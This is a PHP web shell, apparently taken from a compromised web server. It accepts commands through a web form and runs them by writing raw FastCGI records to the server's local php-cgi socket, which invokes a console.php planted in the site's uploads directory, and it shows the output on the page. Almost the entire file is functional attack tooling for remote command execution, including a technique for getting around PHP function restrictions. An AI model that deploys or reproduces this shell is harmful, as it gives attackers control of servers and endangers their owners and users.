📖 File Reader
<?php
// Fixed: Forces proper environment for proc_open in console.php
function exec_cmd_via_console($cmd) {
$socketPath = '/tmp/php-cgi-73.sock';
$scriptFile = '/www/wwwroot/hljrlsj.com/public/uploads/file/20260310/console.php';
$socket = stream_socket_client("unix://$socketPath", $errno, $errstr, 5);
// BEGIN_REQUEST
fwrite($socket, pack('CCnnCa*', 1, 1, 1, 8, 0, pack('NN', 0, 1)));
// CRITICAL: Add these env vars that proc_open needs
$params = [
'SCRIPT_FILENAME' => $scriptFile,
'REQUEST_URI' => '/console.php?cmd=' . urlencode($cmd),
'QUERY_STRING' => 'cmd=' . urlencode($cmd),
'REQUEST_METHOD' => 'GET',
'SERVER_PROTOCOL' => 'HTTP/1.1',
'HTTP_HOST' => 'hljrlsj.com',
'HTTP_USER_AGENT' => 'Mozilla/5.0',
// proc_open needs TERM for non-interactive
'TERM' => 'xterm',
'SHELL' => '/bin/bash',
'PATH' => '/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin'
];
foreach ($params as $k => $v) {
$kl = strlen($k); $vl = strlen($v);
$klen = $kl < 128 ? chr($kl) : "\x80".pack('N',$kl);
$vlen = $vl < 128 ? chr($vl) : "\x80".pack('N',$vl);
$data = $klen.$vlen.$k.$v;
$pad = (8-strlen($data)%8)%8;
fwrite($socket, pack('CCnnC',1,4,1,strlen($data),$pad).$data.str_repeat("\0",$pad));
}
// End records
fwrite($socket, pack('CCnnC',1,4,1,0,0)); // PARAMS END
fwrite($socket, pack('CCnnC',1,5,1,0,0)); // STDIN END
// Read full HTML response
$response = '';
while (!feof($socket)) $response .= fread($socket, 8192);
fclose($socket);
// Extract just command output from HTML
if (preg_match('/<pre class=\'stdout\'>(.*?)<\/pre>/s', $response, $match)) {
return strip_tags($match[1]);
}
return "No output - check HTML: " . substr($response, 0, 500);
}
// Web shell
$cmd = $_GET['cmd'] ?? $_POST['cmd'] ?? 'id';
echo "<h2>🔥 FastCGI Shell via console.php</h2>";
echo "<form method=GET><input name=cmd value='$cmd' style='width:70%'><input type=submit value=EXEC></form>";
echo "<pre>" . exec_cmd_via_console($cmd) . "</pre>";
?>